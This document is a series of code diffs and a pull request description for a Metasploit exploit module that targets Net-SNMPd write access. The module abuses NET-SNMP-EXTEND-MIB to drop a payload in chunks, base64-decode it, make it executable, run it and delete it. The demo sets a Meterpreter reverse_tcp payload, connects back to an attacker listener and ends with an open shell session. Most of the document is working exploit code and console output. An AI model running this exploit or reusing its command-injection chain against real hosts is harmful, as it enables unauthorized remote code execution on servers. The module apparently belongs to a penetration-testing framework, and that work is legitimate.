+    SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+       varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+       varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+       varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+       resp = manager.set([varbind1, varbind2, varbind3])
+       begin
+         status = manager.get_value(oid_4).to_s
+         if status == "noSuchInstance"
+           resp = manager.set([varbind1, varbind2, varbind3])
+           status = manager.get_value(oid_4).to_s
+           print_bad("SNMP is still responsive, this does not look good")
+         end
+         print_status(status)
+       rescue SNMP::RequestTimeout
+         print_good("SNMP request timeout (this is promising).")
+       end
+    end
+    handler
+  end
+end

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -98,8 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
       varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
       varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
       varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
-      resp = manager.set([varbind1, varbind2, varbind3])
-      vprint_status(manager.get_value(oid_4).to_s)
+      begin
+        resp = manager.set([varbind1, varbind2, varbind3])
+        vprint_status(manager.get_value(oid_4).to_s)
+      rescue SNMP::RequestTimeout
+        print_good("SNMP request timeout (this is promising).")
+      end
     end
   end
 

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ii = -1
       end
       vprint_status(i.to_s + " " + ii.to_s)
-      oid_3_value = "-c \"printf \'"+ payload_exe[i..ii]+"\' >> #{full_path}.1\""
+      oid_3_value = "-c \"printf '#{payload_exe[i..ii]}' >> #{full_path}.1\""
       vprint_status(oid_3_value)
       SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
           vprint_status(manager.get_value("sysDescr.0"))

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -78,13 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
     #vprint_status(payload_exe)
     chunk_size = datastore['CHUNKSIZE']
     chunk_size = chunk_size.to_i
-    print_status("Payload generated. Sending in " + chunk_size.to_s + " byte chunk increments.")
+    print_status("Payload generated. Sending in #{chunk_size} byte chunk increments.")
     while i <= payload_exe.length
       ii = i + chunk_size
       if ii > payload_exe.length
         ii = -1
       end
-      vprint_status(i.to_s + " " + ii.to_s)
+      vprint_status("#{i} #{ii}")
       oid_3_value = "-c \"printf '#{payload_exe[i..ii]}' >> #{full_path}.1\""
       vprint_status(oid_3_value)
       SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name'           => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
         'Description'    => %q(
             This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
- configure MIB extensions and lead to remote code execution.
+            configure MIB extensions and lead to remote code execution.
         ),
         'License'        => MSF_LICENSE,
         'Author'         => ['Steve Embling at InteliSecure'],

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Payload'        =>
           {
-            'Space'    => 4096 #arbitrary, but it seems to max out the size
+            'Space'    => 4096
+            #note space above is not a hard limit and can be increased if required
             #'BadChars' => "\x00"
           },
         'Targets'        =>

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -34,17 +34,16 @@ class MetasploitModule < Msf::Exploit::Remote
           },
         'Targets'        =>
         [
-          ['Linux x86', { 
-              'Arch' => ARCH_X86, 
+          ['Linux x86', {
+              'Arch' => ARCH_X86,
               'Platform' => 'linux',
               'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget ]}],
-          ['Linux x64', { 
-              'Arch' => ARCH_X64, 
+          ['Linux x64', {
+              'Arch' => ARCH_X64,
               'Platform' => 'linux',
-              'CmdStagerFlavor' => [ :echo, :printf, :bourne ]}]
+              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget ]}]
           ],
           #Not tested on other platforms but confirmed the above works.
-        
         #'DisclosureDate' => "Dec 22 2017",
         'DefaultTarget'  => 0,
       )

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_status(i.to_s + " " + ii.to_s)
       oid_3_value = "-c \"printf '#{payload_exe[i..ii]}' >> #{full_path}.1\""
       vprint_status(oid_3_value)
-      SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+      SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
           vprint_status(manager.get_value("sysDescr.0"))
           varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
           varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
           vprint_status(manager.get_value(oid_4).to_s)
       end
       #Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.
-      SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+      SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
           varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
           varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
           varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #base64 may not be required here and might not be available on all platforms
     oid_3_value = "-c \"cat #{full_path}.1 | base64 -d > #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};rm {full_path}.1\"" #
     vprint_status(oid_3_value)
-    SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
        varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
        varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
        varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -24,7 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author'         => ['Steve Embling at InteliSecure'],
         'References'     =>
           [
-            [ 'URL', 'https://www.intelisecure.com']
+            [ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt' ],
+            [ 'URL', 'https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sect-system_monitoring_tools-net-snmp-extending'],
+            [ 'URL', 'https://sourceforge.net/p/net-snmp/mailman/message/15735617/']
           ],
         'Payload'        =>
           {
@@ -44,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}]
           ],
           #Not tested on other platforms but confirmed the above works.
-        #'DisclosureDate' => "Dec 22 2017",
+        'DisclosureDate' => "May 10 2004",
         'DefaultTarget'  => 0,
       )
     )


### PR DESCRIPTION
Adds an exploit for authenticated read/write access on Net-SNMPd.

Note this is a re-opening of PR https://github.com/rapid7/metasploit-framework/pull/9341

## Verification
Tested against Ubuntu 16.04
- [ ] Install snmpd `apt-get install snmpd`
- [ ] Add a rw user to the snmpd configuration
- [ ] Restart snmpd service `service snmpd restart`
- [ ] Start `msfconsole`
- [ ] Do: `use exploit/linux/snmp/net_snmpd_rw_access `
- [ ] Set SNMP version `set version 2c`
- [ ] Set R/W Community string, e.g `set community private`
- [ ] Set RHOST
- [ ] Select desired payload
- [ ] `exploit`
- [ ] Verify the shell is returned

## Demo
```
msf > use exploit/linux/snmp/net_snmpd_rw_access 
msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
community => private
msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
version => 2c
msf exploit(linux/snmp/net_snmpd_rw_access) > show options

Module options (exploit/linux/snmp/net_snmpd_rw_access):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
   COMMUNITY  private          yes       SNMP Community String
   FILEPATH   /tmp             yes       file path to write to 
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.1.3      yes       The target address
   RPORT      161              yes       The target port (UDP)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    2c               yes       SNMP Version <1/2c>


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(linux/snmp/net_snmpd_rw_access) > show info

       Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
     Module: exploit/linux/snmp/net_snmpd_rw_access
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Steve Embling at InteliSecure

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
  COMMUNITY  private          yes       SNMP Community String
  FILEPATH   /tmp             yes       file path to write to 
  RETRIES    1                yes       SNMP Retries
  RHOST      192.168.1.3      yes       The target address
  RPORT      161              yes       The target port (UDP)
  TIMEOUT    1                yes       SNMP Timeout
  VERSION    2c               yes       SNMP Version <1/2c>

Payload information:
  Space: 4096

Description:
  This exploit module exploits the SNMP write access configuration 
  ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
  remote code execution.

References:
  https://www.intelisecure.com

msf exploit(linux/snmp/net_snmpd_rw_access) > run

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Writing to NET-SNMP-EXTEND-MIB with given payload
[*] Payload generated. Sending in 200 byte chunk increments.
[*] Sent chunked executable. Now executing payload
[*] Sending stage (849108 bytes) to 192.168.1.3
[+] SNMP request timeout (this is promising).

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.3 - Meterpreter session 1 closed.  Reason: User exit

```

